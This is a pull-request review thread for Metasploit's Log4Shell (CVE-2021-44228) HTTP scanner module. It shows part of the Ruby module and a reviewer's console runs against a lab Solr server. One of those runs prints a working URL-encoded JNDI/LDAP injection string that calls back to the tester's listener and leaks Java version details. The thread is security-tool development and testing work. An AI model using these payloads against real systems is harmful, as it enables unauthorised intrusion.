modules/auxiliary/scanner/http/log4shell_scanner.rb

```diff
@@ -0,0 +1,198 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name' => 'Log4Shell HTTP Scanner',
+      'Description' => %q{
+        This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
+        trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
+        instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
+        HTTP headers and the HTTP request path.
+      },
+      'Author' => [
+        'Spencer McIntyre'
+      ],
+      'References' => [
+        [ 'CVE', '2021-44228' ],
+        [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis' ]
+      ],
+      'DisclosureDate' => '2021-12-09',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'SRVPORT' => 389
+      },
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'AKA' => ['Log4Shell', 'LogJam'],
+        'Reliability' => []
+      }
+    )
+
+    register_options([
+      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
+      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
+      OptPath.new('HEADERS_FILE', [
+        false, 'File containing headers to check',
+        File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')
+      ]),
+      OptPath.new('URIS_FILE', [ false, 'File containing additional URIs to check' ]),
```

Comment:
This was definitely my fault and user error, but the first run against a vulnerable solr target gave me nothing:

```
msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245

[*] Started service listener on 10.9.4.245:389 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
options
[*] Auxiliary module execution completed
```

There wasn't an example in the documentation about it, but it was simple enough to work out from the code that I needed to set URIS_FILE and it worked:

```
msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245 URIS_FILE=/mnt/hgfs/metasploit-framework/data/exploits/CVE-2021-44228/http_uris.txt

[*] Started service listener on 10.9.4.245:389 
[+] 10.10.235.209:8983    - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/qwc04wujkh26xrzbotsteovz6/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Auxiliary module execution completed
```

I wonder if we should update the documentation / default this path

Reply:
Resolved: https://github.com/rapid7/metasploit-framework/pull/15970